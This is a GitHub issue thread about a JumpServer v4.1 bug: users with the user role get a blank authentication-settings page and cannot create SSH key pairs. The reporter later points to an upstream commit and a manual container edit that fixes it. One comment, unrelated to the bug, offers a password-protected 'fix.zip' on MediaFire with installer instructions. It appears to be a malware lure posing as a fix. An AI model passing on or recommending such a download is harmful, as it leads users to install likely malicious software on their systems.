### ISSUE TITLE
[Bug] 用户角色无法创建自己的ssh密钥对

### ISSUE THREAD

**Issue by zmlinn** [jumpserver/jumpserver#14054]
### Product Version

v4.1

### Product Edition

- [X] Community Edition
- [ ] Enterprise Edition
- [ ] Enterprise Trial Edition

### Installation Method

- [X] Online Installation (One-click command installation)
- [ ] Offline Package Installation
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] Source Code

### Environment Information

ubuntu22

### 🐛 Bug Description

带有用户角色的账号登录后，鼠标挪到右上角的个人用户->点击认证设置，打开后是空白页

官方的demo网站也是这样的现象

demo：
https://demo.jumpserver.org/ui/#/

### Recurrence Steps

带有用户角色的账号登录后，鼠标挪到右上角的个人用户->点击认证设置，打开后是空白页

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zmlinn** [comment]
https://github.com/jumpserver/jumpserver/commit/e3bf015aa98c9652c77b26e51015e6ad55757508

**Comment by zmlinn** [comment]
https://github.com/jumpserver/jumpserver/commit/e3bf015aa98c9652c77b26e51015e6ad55757508   手动修改jms_core容器里面的代码，可以修复这个问题
